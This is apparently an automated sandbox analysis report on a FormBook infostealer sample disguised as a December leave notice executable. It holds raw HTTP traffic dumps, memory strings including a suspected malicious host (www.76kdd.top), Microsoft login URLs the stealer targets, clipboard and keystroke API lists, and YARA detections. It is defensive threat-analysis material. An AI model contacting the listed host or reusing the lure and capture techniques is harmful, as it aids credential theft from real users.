6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: ed04a8f0-3ab8-4ec9-8771-a218b09400f0x-runtime: 0.038671content-length: 18183connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:19:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e02f2c-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.76kdd.top
                Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.76kdd.top/6rpr/
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: Utilman.exe, 00000005.00000003.2697742475.0000000007CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
                Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
                Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FD6B0C
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00FD6D07
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FD6B0C
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00FC2B37
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FEF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00FEF7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: This is a third-party compiled AutoIt script.0_2_00F83D19
                Source: Mandatory Notice for all December Leave and Vacation application.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000000.2105902097.000000000102E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0a9f226f-6
                Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000000.2105902097.000000000102E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4a33f228-4
                Source: Mandatory Notice for all December Leave and Vacation application.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3b6da2df-1
                Source: Mandatory Notice for all December Leave and Vacation application.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a934a1e1-5
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Mandatory Notice for all December Leave and Vacation application.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C773 NtClose,2_2_0042C773
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
